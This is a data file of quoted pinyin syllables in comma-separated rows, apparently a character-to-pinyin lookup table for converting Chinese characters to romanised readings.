"cun","wai","jing","kan","jing","zhu","zhu","le","peng","yu","chi","gan","mang","zhu","wan","du","ji","xiao","ba","suan","ji","qin","zhao","sun","ya","zhui","yuan","hu","hang","xiao","cen","bi","bi","jian","yi","dong","shan","sheng","da","di","zhu","na","chi","gu","li","qie","min","bao","tiao","si","fu","ce","ben","pei","da","zi","di","ling","ze","nu","fu","gou","fan","jia","gan","fan","shi","mao","po","ti","jian","qiong","long","min","bian","luo","gui","qu","chi","yin","yao","xian","bi","qiong","kuo","deng","xiao","jin","quan","sun","ru","fa","kuang","zhu","tong","ji","da","hang","ce","zhong","kou","lai","bi","shai","dang","zheng","ce","fu","yun","tu","pa","li","lang","ju","guan","jian","han","tong","xia","zhi","cheng","suan","shi","zhu","zuo","xiao","shao","ting","ce",
"yan","gao","kuai","gan","chou","kuang","gang","yun","o","qian","xiao","jian","pou","lai","zou","bi","bi","bi","ge","tai","guai","yu","jian","dao","gu","chi","zheng","qing","sha","zhou","lu","bo","ji","lin","suan","jun","fu","zha","gu","kong","qian","qian","jun","chui","guan","yuan","ce","zu","bo","ze","qie","tuo","luo","dan","xiao","ruo","jian","xuan","bian","sun","xiang","xian","ping","zhen","xing","hu","yi","zhu","yue","chun","lu","wu","dong","shuo","ji","jie","huang","xing","mei","fan","chuan","zhuan","pian","feng","zhu","huang","qie","hou","qiu","miao","qian","gu","kui","shi","lou","yun","he","tang","yue","chou","gao","fei","ruo","zheng","gou","nie","qian","xiao","cuan","long","peng","du","li","bi","zhuo","chu","shai","chi","zhu","qiang","long","lan","jian","bu","li","hui","bi","di","cong",
"yan","peng","can","zhuan","pi","piao","dou","yu","mie","tuan","ze","shai","gui","yi","hu","chan","kou","cu","ping","zao","ji","gui","su","lou","ce","lu","nian","suo","cuan","diao","suo","le","duan","liang","xiao","bo","mi","shai","dang","liao","dan","dian","fu","jian","min","kui","dai","jiao","deng","huang","sun","lao","zan","xiao","lu","shi","zan","qi","pai","qi","pai","gan","ju","du","lu","yan","bo","dang","sai","zhua","long","qian","lian","bu","zhou","lai","shi","lan","kui","yu","yue","hao","zhen","tai","ti","nie","chou","ji","yi","qi","teng","zhuan","zhou","fan","sou","zhou","qian","zhuo","teng","lu","lu","jian","tuo","ying","yu","lai","long","qie","lian","lan","qian","yue","zhong","qu","lian","bian","duan","zuan","li","si","luo","ying","yue","zhuo","yu","mi","di","fan","shen",
"zhe","shen","nu","he","lei","xian","zi","ni","cun","zhang","qian","zhai","bi","ban","wu","sha","kang","rou","fen","bi","cui","yin","zhe","chi","tai","hu","ba","li","gan","ju","po","mo","cu","zhan","zhou","li","su","tiao","li","xi","su","hong","tong","zi","ce","yue","zhou","lin","zhuang","bai","lao","fen","er","qu","he","liang","xian","fu","liang","can","jing","li","yue","lu","ju","qi","cui","bai","zhang","lin","zong","jing","guo","hua","san","san","tang","bian","rou","mian","hou","xu","zong","hu","jian","zan","ci","li","xie","fu","nuo","bei","gu","xiu","gao","tang","qiu","jia","cao","zhuang","tang","mi","san","fen","zao","kang","jiang","mo","san","san","nuo","xi","liang","jiang","kuai","bo","huan","shu","zong","xian","nuo","tuan","nie","li","zuo","di","nie","tiao","lan",
"mi","si","jiu","xi","gong","zheng","jiu","you","ji","cha","zhou","xun","yue","hong","yu","he","wan","ren","wen","wen","qiu","na","zi","tou","niu","fou","ji","shu","chun","pi","zhen","sha","hong","zhi","ji","fen","yun","ren","dan","jin","su","fang","suo","cui","jiu","za","ba","jin","fu","zhi","ci","zi","chou","hong","za","lei","xi","fu","xie","shen","bo","zhu","qu","ling","zhu","shao","gan","yang","fu","tuo","zhen","dai","chu","shi","zhong","xian","zu","jiong","ban","qu","mo","shu","zui","kuang","jing","ren","hang","xie","jie","zhu","chou","gua","bai","jue","kuang","hu","ci","huan","geng","tao","jie","ku","jiao","quan","gai","luo","xuan","beng","xian","fu","gei","dong","rong","tiao","yin","lei","xie","juan","xu","gai","die","tong","si","jiang","xiang","hui","jue","zhi","jian",
"juan","chi","mian","zhen","lu","cheng","qiu","shu","bang","tong","xiao","huan","qin","geng","xiu","ti","tou","xie","hong","xi","fu","ting","sui","dui","kun","fu","jing","hu","zhi","yan","jiong","feng","ji","xu","ren","zong","chen","duo","li","lu","liang","chou","quan","shao","qi","qi","zhun","qi","wan","qian","xian","shou","wei","qi","tao","wan","gang","wang","beng","zhui","cai","guo","cui","lun","liu","qi","zhan","bi","chuo","ling","mian","qi","qie","tian","zong","gun","zou","xi","zi","xing","liang","jin","fei","rui","min","yu","zong","fan","lu","xu","ying","shang","qi","xu","xiang","jian","ke","xian","ruan","mian","ji","duan","chong","di","min","miao","yuan","xie","bao","si","qiu","bian","huan","geng","cong","mian","wei","fu","wei","tou","gou","miao","xie","lian","zong","bian","yun","yin","ti",
"gua","zhi","yun","cheng","chan","dai","xia","yuan","zong","xu","ying","wei","geng","xuan","ying","jin","yi","zhui","ni","bang","gu","pan","zhou","jian","ci","quan","shuang","yun","xia","cui","xi","rong","tao","fu","yun","chen","gao","ru","hu","zai","teng","xian","su","zhen","zong","tao","huang","cai","bi","feng","cu","li","suo","yan","xi","zong","lei","juan","qian","man","zhi","lu","mu","piao","lian","mi","xuan","zong","ji","shan","sui","fan","lu","beng","yi","sao","mou","yao","qiang","hun","xian","ji","sha","xiu","ran","xuan","sui","qiao","zeng","zuo","zhi","shan","san","lin","yu","fan","liao","chuo","zun","jian","rao","chan","rui","xiu","hui","hua","zuan","xi","qiang","yun","da","sheng","hui","xi","se","jian","jiang","huan","zao","cong","xie","jiao","bi","dan","yi","nong","sui","yi","shai",
"xu","ji","bin","qian","lan","pu","xun","zuan","qi","peng","yao","mo","lei","xie","zuan","kuang","you","xu","lei","xian","chan","jiao","lu","chan","ying","cai","rang","xian","zui","zuan","luo","li","dao","lan","lei","lian","si","jiu","yu","hong","zhou","xian","ge","yue","ji","wan","kuang","ji","ren","wei","yun","hong","chun","pi","sha","gang","na","ren","zong","lun","fen","zhi","wen","fang","zhu","zhen","niu","shu","xian","gan","xie","fu","lian","zu","shen","xi","zhi","zhong","zhou","ban","fu","chu","shao","yi","jing","dai","bang","rong","jie","ku","rao","die","hang","hui","gei","xuan","jiang","luo","jue","jiao","tong","geng","xiao","juan","xiu","xi","sui","tao","ji","ti","ji","xu","ling","ying","xu","qi","fei","chuo","shang","gun","sheng","wei","mian","shou","beng","chou","tao","liu","quan",
"zong","zhan","wan","lu","zhui","zi","ke","xiang","jian","mian","lan","ti","miao","ji","yun","hui","si","duo","duan","bian","xian","gou","zhui","huan","di","lu","bian","min","yuan","jin","fu","ru","zhen","feng","cui","gao","chan","li","yi","jian","bin","piao","man","lei","ying","suo","mou","sao","xie","liao","shan","zeng","jiang","qian","qiao","huan","jiao","zuan","fou","xie","gang","fou","que","fou","qi","bo","ping","xiang","zhao","gang","ying","ying","qing","xia","guan","zun","tan","cang","qi","weng","ying","lei","tan","lu","guan","wang","wang","gang","wang","han","luo","luo","fu","mi","fa","gu","zhu","ju","mao","gu","min","gang","ba","gua","ti","juan","fu","shen","yan","zhao","zui","gua","zhuo","yu","zhi","an","fa","lan","shu","si","pi","ma","liu","ba","fa","li","chao","wei","bi",
"ji","zeng","chong","liu","ji","juan","mi","zhao","luo","pi","ji","ji","luan","yang","mi","qiang","da","mei","yang","you","you","fen","ba","gao","yang","gu","qiang","zang","gao","ling","yi","zhu","di","xiu","qiang","yi","xian","rong","qun","qun","qiang","huan","suo","xian","yi","yang","qiang","qian","yu","geng","jie","tang","yuan","xi","fan","shan","fen","shan","lian","lei","geng","nou","qiang","chan","yu","gong","yi","chong","weng","fen","hong","chi","chi","cui","fu","xia","ben","yi","la","yi","pi","ling","liu","zhi","qu","xi","xie","xiang","xi","xi","ke","qiao","hui","hui","xiao","sha","hong","jiang","di","cui","fei","dao","sha","chi","zhu","jian","xuan","chi","pian","zong","wan","hui","hou","he","he","han","ao","piao","yi","lian","hou","ao","lin","pen","qiao","ao","fan","yi","hui",
"xuan","dao","yao","lao","lao","kao","mao","zhe","qi","gou","gou","gou","die","die","er","shua","ruan","nai","nai","duan","lei","ting","zi","geng","chao","hao","yun","ba","pi","yi","si","qu","jia","ju","huo","chu","lao","lun","ji","tang","ou","lou","nou","jiang","pang","zha","lou","ji","lao","huo","you","mo","huai","er","yi","ding","ye","da","song","qin","yun","chi","dan","dan","hong","geng","zhi","pan","nie","dan","zhen","che","ling","zheng","you","wa","liao","long","zhi","ning","tiao","er","ya","tie","gua","xu","lian","hao","sheng","lie","pin","jing","ju","bi","di","guo","wen","xu","ping","cong","ding","ni","ting","ju","cong","kui","lian","kui","cong","lian","weng","kui","lian","lian","cong","ao","sheng","song","ting","kui","nie","zhi","dan","ning","qie","ni","ting","ting","long",
"yu","yu","zhao","si","su","yi","su","si","zhao","zhao","rou","yi","le","ji","qiu","ken","cao","ge","bo","huan","huang","yi","ren","xiao","ru","zhou","yuan","du","gang","rong","gan","cha","wo","chang","gu","zhi","han","fu","fei","fen","pei","pang","jian","fang","zhun","you","na","ang","ken","ran","gong","yu","wen","yao","qi","pi","qian","xi","xi","fei","ken","jing","tai","shen","zhong","zhang","xie","shen","wei","zhou","die","dan","fei","ba","bo","qu","tian","bei","gua","tai","zi","ku","zhi","ni","ping","zi","fu","pang","zhen","xian","zuo","pei","jia","sheng","zhi","bao","mu","qu","hu","ke","chi","yin","xu","yang","long","dong","ka","lu","jing","nu","yan","pang","kua","yi","guang","hai","ge","dong","chi","jiao","xiong","xiong","er","an","heng","pian","neng","zi","gui",
"cheng","tiao","zhi","cui","mei","xie","cui","xie","mai","mai","ji","xie","nin","kuai","sa","zang","qi","nao","mi","nong","luan","wan","bo","wen","wan","xiu","jiao","jing","you","heng","cuo","lie","shan","ting","mei","chun","shen","qian","de","juan","cu","xiu","xin","tuo","pao","cheng","nei","pu","dou","tuo","niao","nao","pi","gu","luo","li","lian","zhang","cui","jie","liang","shui","pi","biao","lun","pian","lei","kui","chui","dan","tian","nei","jing","nai","la","ye","yan","ren","shen","chuo","fu","fu","ju","fei","qiang","wan","dong","pi","guo","zong","ding","wo","mei","ni","zhuan","chi","cou","luo","ou","di","an","xing","nao","shu","shuan","nan","yun","zhong","rou","e","sai","tu","yao","jian","wei","jiao","yu","jia","duan","bi","chang","fu","xian","ni","mian","wa","teng","tui","bang",
"qian","lu","wa","sou","tang","su","zhui","ge","yi","bo","liao","ji","pi","xie","gao","lu","bin","ou","chang","lu","guo","pang","chuai","biao","jiang","fu","tang","mo","xi","zhuan","lu","jiao","ying","lu","zhi","xue","chun","lin","tong","peng","ni","chuai","liao","cui","gui","xiao","teng","fan","zhi","jiao","shan","hu","cui","run","xiang","sui","fen","ying","shan","zhua","dan","kuai","nong","tun","lian","bi","yong","jue","chu","yi","juan","la","lian","sao","tun","gu","qi","cui","bin","xun","nao","wo","zang","xian","biao","xing","kuan","la","yan","lu","huo","za","luo","qu","zang","luan","ni","za","chen","qian","wo","guang","zang","lin","guang","zi","jiao","nie","chou","ji","gao","chou","mian","nie","zhi","zhi","ge","jian","die","zhi","xiu","tai","zhen","jiu","xian","yu","cha","yao","yu",
"chong","xi","xi","jiu","yu","yu","xing","ju","jiu","xin","she","she","she","jiu","shi","tan","shu","shi","tian","tan","pu","pu","guan","hua","tian","chuan","shun","xia","wu","zhou","dao","chuan","shan","yi","fan","pa","tai","fan","ban","chuan","hang","fang","ban","bi","lu","zhong","jian","cang","ling","zhu","ze","duo","bo","xian","ge","chuan","xia","lu","qiong","pang","xi","kua","fu","zao","feng","li","shao","yu","lang","ting","yu","wei","bo","meng","nian","ju","huang","shou","ke","bian","mu","die","dou","bang","cha","yi","sou","cang","cao","lou","dai","xue","yao","chong","deng","dang","qiang","lu","yi","ji","jian","huo","meng","qi","lu","lu","chan","shuang","gen","liang","jian","jian","se","yan","fu","ping","yan","yan","cao","cao","yi","le","ting","jiao","ai","nai","tiao","jiao","jie",
"peng","wan","yi","chai","mian","mi","gan","qian","yu","yu","shao","qiong","du","hu","qi","mang","zi","hui","sui","zhi","xiang","pi","fu","tun","wei","wu","zhi","qi","shan","wen","qian","ren","fu","kou","jie","lu","xu","ji","qin","qi","yan","fen","ba","rui","xin","ji","hua","hua","fang","wu","jue","gou","zhi","yun","qin","ao","chu","mao","ya","fei","reng","hang","cong","yin","you","bian","yi","qie","wei","li","pi","e","xian","chang","cang","zhu","su","ti","yuan","ran","ling","tai","shao","di","miao","qing","li","yong","ke","mu","bei","bao","gou","min","yi","yi","ju","pie","ruo","ku","ning","ni","bo","bing","shan","xiu","yao","xian","ben","hong","ying","zha","dong","ju","die","nie","gan","hu","ping","mei","fu","sheng","gu","bi","wei","fu","zhuo","mao","fan",
"jia","mao","mao","ba","ci","mo","zi","di","chi","ji","jing","long","cong","niao","yuan","xue","ying","qiong","ge","ming","li","rong","yin","gen","qian","chai","chen","yu","hao","zi","lie","wu","ji","gui","ci","jian","ci","gou","guang","mang","cha","jiao","jiao","fu","yu","zhu","zi","jiang","hui","yin","cha","fa","rong","ru","chong","mang","tong","zhong","qian","zhu","xun","huan","fu","quan","gai","da","jing","xing","chuan","cao","jing","er","an","qiao","chi","ren","jian","ti","huang","ping","li","jin","lao","shu","zhuang","da","jia","rao","bi","ze","qiao","hui","ji","dang","yu","rong","hun","xing","luo","ying","xun","jin","sun","yin","mai","hong","zhou","yao","du","wei","li","dou","fu","ren","yin","he","bi","bu","yun","di","tu","sui","sui","cheng","chen","wu","bie","xi","geng",
"li","pu","zhu","mo","li","zhuang","zuo","tuo","qiu","sha","suo","chen","peng","ju","mei","meng","xing","jing","che","shen","jun","yan","ting","you","cuo","guan","han","you","cuo","jia","wang","su","niu","shao","xian","lang","fu","e","mo","wen","jie","nan","mu","kan","lai","lian","shi","wo","tu","xian","huo","you","ying","ying","gong","chun","mang","mang","ci","wan","jing","di","qu","dong","jian","zou","gu","la","lu","ju","wei","jun","nie","kun","he","pu","zai","gao","guo","fu","lun","chang","chou","song","chui","zhan","men","cai","ba","li","tu","bo","han","bao","qin","juan","xi","qin","di","jie","pu","dang","jin","qiao","tai","geng","hua","gu","ling","fei","qin","an","wang","beng","zhou","yan","ju","jian","lin","tan","shu","tian","dao","hu","qi","he","cui","tao","chun",
"bi","chang","huan","fei","lai","qi","meng","ping","wei","dan","sha","huan","yan","yi","tiao","qi","wan","ce","nai","zhen","tuo","jiu","tie","luo","bi","yi","meng","bo","pao","ding","ying","ying","ying","xiao","sa","qiu","ke","xiang","wan","yu","yu","fu","lian","xuan","xuan","nan","ce","wo","chun","xiao","yu","bian","mao","an","e","luo","ying","kuo","kuo","jiang","mian","zuo","zuo","zu","bao","rou","xi","ye","an","qu","jian","fu","lu","jing","pen","feng","hong","hong","hou","yan","tu","zhe","zi","xiang","ren","ge","qia","qing","mi","huang","shen","pu","gai","dong","zhou","jian","wei","bo","wei","pa","ji","hu","zang","jia","duan","yao","sui","cong","quan","wei","zhen","kui","ting","hun","xi","shi","qi","lan","zong","yao","yuan","mei","yun","shu","di","zhuan","guan","ran","xue",
"chan","kai","kui","hua","jiang","lou","wei","pai","you","sou","yin","shi","chun","shi","yun","zhen","lang","ru","meng","li","que","suan","yuan","li","ju","xi","bang","chu","xu","tu","liu","huo","dian","qian","zu","po","cuo","yuan","chu","yu","kuai","pan","pu","pu","na","shuo","xi","fen","yun","zheng","jian","ji","ruo","cang","en","mi","hao","sun","zhen","ming","sou","xu","liu","xi","gu","lang","rong","weng","gai","cuo","shi","tang","luo","ru","suo","xuan","bei","yao","gui","bi","zong","gun","zuo","tiao","ce","pei","lan","dan","ji","li","shen","lang","yu","ling","ying","mo","diao","tiao","mao","tong","chu","peng","an","lian","cong","xi","ping","qiu","jin","chun","jie","wei","tui","cao","yu","yi","zi","liao","bi","lu","xu","bu","zhang","lei","qiang","man","yan","ling","ji",
"biao","gun","han","di","su","lu","she","shang","di","mie","xun","man","bo","di","cuo","zhe","shen","xuan","wei","hu","ao","mi","lou","cu","zhong","cai","po","jiang","mi","cong","niao","hui","juan","yin","jian","nian","shu","yin","guo","chen","hu","sha","kou","qian","ma","zang","ze","qiang","dou","lian","lin","kou","ai","bi","li","wei","ji","qian","sheng","fan","meng","ou","chan","dian","xun","jiao","rui","rui","lei","yu","qiao","chu","hua","jian","mai","yun","bao","you","qu","lu","rao","hui","e","ti","fei","jue","zui","fa","ru","fen","kui","shun","rui","ya","xu","fu","jue","dang","wu","dong","si","xiao","xi","long","wen","shao","qi","jian","yun","sun","ling","yu","xia","weng","ji","hong","si","nong","lei","xuan","yun","yu","xi","hao","bao","hao","ai","wei","hui",
"hui","ji","ci","xiang","wan","mie","yi","leng","jiang","can","shen","qiang","lian","ke","yuan","da","ti","tang","xue","bi","zhan","sun","xian","fan","ding","xie","gu","xie","shu","jian","hao","hong","sa","xin","xun","yao","bai","sou","shu","xun","dui","pin","wei","ning","chou","mai","ru","piao","tai","ji","zao","chen","zhen","er","ni","ying","gao","cong","xiao","qi","fa","jian","xu","kui","ji","bian","diao","mi","lan","jin","cang","miao","qiong","qie","xian","liao","ou","xian","su","lu","yi","xu","xie","li","yi","la","lei","jiao","di","zhi","bei","teng","yao","mo","huan","biao","fan","sou","tan","tui","qiong","qiao","wei","liu","hui","ou","gao","yun","bao","li","shu","chu","ai","lin","zao","xuan","qin","lai","huo","tuo","wu","rui","rui","qi","heng","lu","su","tui","meng",
"yun","ping","yu","xun","ji","jiong","xuan","mo","qiu","su","jiong","feng","nie","bo","rang","yi","xian","yu","ju","lian","lian","yin","qiang","ying","long","tou","wei","yue","ling","qu","yao","fan","mei","han","kui","lan","ji","dang","man","lei","lei","hui","feng","zhi","wei","kui","zhan","huai","li","ji","mi","lei","huai","luo","ji","kui","lu","jian","sa","teng","lei","quan","xiao","yi","luan","men","bie","hu","hu","lu","nue","lu","si","xiao","qian","chu","hu","xu","cuo","fu","xu","xu","lu","hu","yu","hao","jiao","ju","guo","bao","yan","zhan","zhan","kui","bin","xi","shu","chong","qiu","diao","ji","qiu","ding","shi","xia","jue","zhe","she","yu","han","zi","hong","hui","meng","ge","sui","xia","chai","shi","yi","ma","xiang","fang","e","ba","chi","qian","wen","wen",
"rui","bang","pi","yue","yue","jun","qi","tong","yin","qi","can","yuan","jue","hui","qin","qi","zhong","ya","hao","mu","wang","fen","fen","hang","gong","zao","fu","ran","jie","fu","chi","dou","bao","xian","ni","te","qiu","you","zha","ping","chi","you","he","han","ju","li","fu","ran","zha","gou","pi","pi","xian","zhu","diao","bie","bing","gu","zhan","qu","she","tie","ling","gu","dan","gu","ying","li","cheng","qu","mou","ge","ci","hui","hui","mang","fu","yang","wa","lie","zhu","yi","xian","kuo","jiao","li","yi","ping","qi","ha","she","yi","wang","mo","qiong","qie","gui","qiong","zhi","man","lao","zhe","jia","nao","si","qi","xing","jie","qiu","shao","yong","jia","tui","che","bai","e","han","shu","xuan","feng","shen","shen","fu","xian","zhe","wu","fu","li","lang",
"bi","chu","yuan","you","jie","dan","yan","ting","dian","tui","hui","wo","zhi","song","fei","ju","mi","qi","qi","yu","jun","la","meng","qiang","si","xi","lun","li","die","tiao","tao","kun","han","han","yu","bang","fei","pi","wei","dun","yi","yuan","suo","quan","qian","rui","ni","qing","wei","liang","guo","wan","dong","e","ban","di","wang","can","yang","ying","guo","chan","ding","la","ke","jie","xie","ting","mao","xu","mian","yu","jie","shi","xuan","huang","yan","bian","rou","wei","fu","yuan","mei","wei","fu","ru","xie","you","qiu","mao","xia","ying","shi","chong","tang","zhu","zong","ti","fu","yuan","kui","meng","la","du","hu","qiu","die","li","wo","yun","qu","nan","lou","chun","rong","ying","jiang","ban","lang","pang","si","xi","ci","xi","yuan","weng","lian","sou","ban",
"rong","rong","ji","wu","xiu","han","qin","yi","bi","hua","tang","yi","du","nai","he","hu","gui","ma","ming","yi","wen","ying","te","zhong","cang","sao","qi","man","tiao","shang","shi","cao","chi","di","ao","lu","wei","zhi","tang","chen","piao","qu","pi","yu","jian","luo","lou","qin","zhong","yin","jiang","shuai","wen","xiao","wan","zhe","zhe","ma","ma","guo","liu","mao","xi","cong","li","man","xiao","chang","zhang","mang","xiang","mo","zui","si","qiu","te","zhi","peng","peng","jiao","qu","bie","liao","pan","gui","xi","ji","zhuan","huang","fei","lao","jue","jue","hui","yin","chan","jiao","shan","nao","xiao","wu","chong","xun","si","chu","cheng","dang","li","xie","shan","yi","jing","da","chan","qi","ci","xiang","she","luo","qin","ying","chai","li","zei","xuan","lian","zhu","ze","xie",
"mang","xie","qi","rong","jian","meng","hao","ru","huo","zhuo","jie","pin","he","mie","fan","lei","jie","la","min","li","chun","li","qiu","nie","lu","du","xiao","zhu","long","li","long","feng","ye","beng","nang","gu","juan","ying","shu","xi","can","qu","quan","du","can","man","qu","jie","zhu","zhuo","xue","huang","niu","pei","nu","xin","zhong","mai","er","ka","mie","xi","xing","yan","kan","yuan","qu","ling","xuan","shu","xian","tong","xiang","jie","xian","ya","hu","wei","dao","chong","wei","dao","zhun","heng","qu","yi","yi","bu","gan","yu","biao","cha","yi","shan","chen","fu","gun","fen","shuai","jie","na","zhong","dan","yi","zhong","zhong","jie","zhi","xie","ran","zhi","ren","qin","jin","jun","yuan","mei","chai","ao","niao","hui","ran","jia","tuo","ling","dai","bao","pao","yao",
"zuo","bi","shao","tan","ju","he","xue","xiu","zhen","yi","pa","bo","di","wa","fu","gun","zhi","zhi","ran","pan","yi","mao","tuo","na","gou","xuan","zhe","qu","bei","gun","xi","ni","bo","bo","fu","chi","chi","ku","ren","jiang","jia","jian","bo","jie","er","ge","ru","zhu","gui","yin","cai","lie","ka","xing","zhuang","dang","xu","kun","ken","niao","shu","jia","kun","cheng","li","juan","shen","pou","ge","yi","yu","zhen","liu","qiu","qun","ji","yi","bu","zhuang","shui","sha","qun","li","lian","lian","ku","jian","fou","chan","bi","kun","tao","yuan","ling","chi","chang","chou","duo","biao","liang","shang","pei","pei","fei","yuan","luo","guo","yan","du","ti","zhi","ju","yi","ji","zhi","gua","ken","qi","ti","ti","fu","chong","xie","bian","die","kun","duan","xiu","xiu",
"he","yuan","bao","bao","fu","yu","tuan","yan","hui","bei","chu","lu","pao","dan","yun","ta","gou","da","huai","rong","yuan","ru","nai","jiong","suo","ban","tui","chi","sang","niao","ying","jie","qian","huai","ku","lian","lan","li","zhe","shi","lu","yi","die","xie","xian","wei","biao","cao","ji","qiang","sen","bao","xiang","bi","fu","jian","zhuan","jian","cui","ji","dan","za","fan","bo","xiang","xin","bie","rao","man","lan","ao","ze","gui","cao","sui","nong","chan","lian","bi","jin","dang","shu","tan","bi","lan","pu","ru","zhi","dui","shu","wa","shi","bai","xie","bo","chen","lai","long","xi","xian","lan","zhe","dai","ju","zan","shi","jian","pan","yi","lan","ya","xi","xi","yao","feng","tan","fu","fiao","fu","ba","he","ji","ji","jian","guan","bian","yan","gui","jue",
"pian","mao","mi","mi","mie","shi","si","chan","luo","jue","mi","tiao","lian","yao","zhi","jun","xi","shan","wei","xi","tian","yu","lan","e","du","qin","pang","ji","ming","ying","gou","qu","zhan","jin","guan","deng","jian","luo","qu","jian","wei","jue","qu","luo","lan","shen","di","guan","jian","guan","yan","gui","mi","shi","chan","lan","jue","ji","xi","di","tian","yu","gou","jin","qu","jiao","qiu","jin","cu","jue","zhi","chao","ji","gu","dan","zi","di","shang","hua","quan","ge","shi","jie","gui","gong","chu","jie","hun","qiu","xing","su","ni","ji","lu","zhi","zha","bi","xing","hu","shang","gong","zhi","xue","chu","xi","yi","li","jue","xi","yan","xi","yan","yan","ding","fu","qiu","qiu","jiao","hong","ji","fan","xun","diao","hong","chai","tao","xu","jie","yi",
"ren","xun","yin","shan","qi","tuo","ji","xun","yin","e","fen","ya","yao","song","shen","yin","xin","jue","xiao","ne","chen","you","zhi","xiong","fang","xin","chao","she","xian","sa","zhun","xu","yi","yi","su","chi","he","shen","he","xu","zhen","zhu","zheng","gou","zi","zi","zhan","gu","fu","jian","die","ling","di","yang","li","nao","pan","zhou","gan","yi","ju","yao","zha","yi","yi","qu","zhao","ping","bi","xiong","qu","ba","da","zu","tao","zhu","ci","zhe","yong","xu","xun","yi","huang","he","shi","cha","xiao","shi","hen","cha","gou","gui","quan","hui","jie","hua","gai","xiang","wei","shen","zhou","tong","mi","zhan","ming","e","hui","yan","xiong","gua","er","bing","tiao","yi","lei","zhu","kuang","kua","wu","yu","teng","ji","zhi","ren","cu","lang","e","kuang","ei",
"shi","ting","dan","bei","chan","you","keng","qiao","qin","shua","an","yu","xiao","cheng","jie","xian","wu","wu","gao","song","bu","hui","jing","shuo","zhen","shuo","du","hua","chang","shui","jie","ke","qu","cong","xiao","sui","wang","xian","fei","chi","ta","yi","ni","yin","diao","pi","zhuo","chan","chen","zhun","ji","qi","tan","zhui","wei","ju","qing","dong","zheng","ze","zou","qian","zhuo","liang","jian","chu","hao","lun","shen","biao","huai","pian","yu","die","xu","pian","shi","xuan","shi","hun","hua","e","zhong","di","xie","fu","pu","ting","jian","qi","yu","zi","zhuan","xi","hui","yin","an","xian","nan","chen","feng","zhu","yang","yan","huang","xuan","ge","nuo","qi","mou","ye","wei","xing","teng","zhou","shan","jian","po","kui","huang","huo","ge","ying","mi","xiao","mi","xi","qiang","chen",
"xue","ti","su","bang","chi","qian","shi","jiang","yuan","xie","he","tao","yao","yao","zhi","yu","biao","cong","qing","li","mo","mo","shang","zhe","miu","jian","ze","jie","lian","lou","can","ou","gun","xi","zhuo","ao","ao","jin","zhe","yi","hu","jiang","man","chao","han","hua","chan","xu","zeng","se","xi","zha","dui","zheng","nao","lan","e","ying","jue","ji","zun","jiao","bo","hui","zhuan","wu","zen","zha","shi","qiao","tan","zen","pu","sheng","xuan","zao","tan","dang","sui","xian","ji","jiao","jing","zhan","nang","yi","ai","zhan","pi","hui","hua","yi","yi","shan","rang","nou","qian","zhui","ta","hu","zhou","hao","ai","ying","jian","yu","jian","hui","du","zhe","xuan","zan","lei","shen","wei","chan","li","yi","bian","zhe","yan","e","chou","wei","chou","yao","chan","rang","yin",
"lan","chen","xie","nie","huan","zan","yi","dang","zhan","yan","du","yan","ji","ding","fu","ren","ji","jie","hong","tao","rang","shan","qi","tuo","xun","yi","xun","ji","ren","jiang","hui","ou","ju","ya","ne","xu","e","lun","xiong","song","feng","she","fang","jue","zheng","gu","he","ping","zu","shi","xiong","zha","su","zhen","di","zhou","ci","qu","zhao","bi","yi","yi","kuang","lei","shi","gua","shi","ji","hui","cheng","zhu","shen","hua","dan","gou","quan","gui","xun","yi","zheng","gai","xiang","cha","hun","xu","zhou","jie","wu","yu","qiao","wu","gao","you","hui","kuang","shuo","song","ei","qing","zhu","zou","nuo","du","zhuo","fei","ke","wei","yu","shui","shen","diao","chan","liang","zhun","sui","tan","shen","yi","mou","chen","die","huang","jian","xie","xue","ye","wei","e","yu",
"xuan","chan","zi","an","yan","di","mi","pian","xu","mo","dang","su","xie","yao","bang","shi","qian","mi","jin","man","zhe","jian","miu","tan","zen","qiao","lan","pu","jue","yan","qian","zhan","chen","gu","qian","hong","xia","ji","hong","han","hong","xi","xi","huo","liao","han","du","long","dou","jiang","qi","shi","li","deng","wan","bi","shu","xian","feng","zhi","zhi","yan","yan","shi","chu","hui","tun","yi","tun","yi","jian","ba","hou","e","chu","xiang","huan","jian","ken","gai","ju","fu","xi","bin","hao","yu","zhu","jia","fen","xi","bo","wen","huan","bin","di","zong","fen","yi","zhi","bao","chai","an","pi","na","pi","gou","na","you","diao","mo","si","xiu","huan","kun","he","hao","mo","han","mao","li","ni","bi","yu","jia","tuan","mao","pi","xi","e",
"ju","mo","chu","tan","huan","jue","bei","zhen","yuan","fu","cai","gong","te","yi","hang","wan","pin","huo","fan","tan","guan","ze","zhi","er","zhu","shi","bi","zi","er","gui","pian","bian","mai","dai","sheng","kuang","fei","tie","yi","chi","mao","he","bi","lu","lin","hui","gai","pian","zi","jia","xu","zei","jiao","gai","zang","jian","ying","xun","zhen","she","bin","bin","qiu","she","chuan","zang","zhou","lai","zan","ci","chen","shang","tian","pei","geng","xian","mai","jian","sui","fu","tan","cong","cong","zhi","ji","zhang","du","jin","xiong","chun","yun","bao","zai","lai","feng","cang","ji","sheng","yi","zhuan","fu","gou","sai","ze","liao","yi","bai","chen","wan","zhi","zhui","biao","yun","zeng","dan","zan","yan","pu","shan","wan","ying","jin","gan","xian","zang","bi","du","shu","yan",
"shang","xuan","long","gan","zang","bei","zhen","fu","yuan","gong","cai","ze","xian","bai","zhang","huo","zhi","fan","tan","pin","bian","gou","zhu","guan","er","jian","ben","shi","tie","gui","kuang","dai","mao","fei","he","yi","zei","zhi","jia","hui","zi","lin","lu","zang","zi","gai","jin","qiu","zhen","lai","she","fu","du","ji","shu","shang","ci","bi","zhou","geng","pei","dan","lai","feng","zhui","fu","zhuan","sai","ze","yan","zan","yun","zeng","shan","ying","gan","chi","xi","she","nan","tong","xi","cheng","he","cheng","zhe","xia","tang","zou","zou","li","jiu","fu","zhao","gan","qi","shan","qiong","yin","xian","ci","jue","qin","chi","ci","chen","chen","die","ju","chao","di","xi","zhan","jue","yue","qu","ji","chi","chu","gua","xue","zi","tiao","duo","lie","gan","suo","cu","xi",
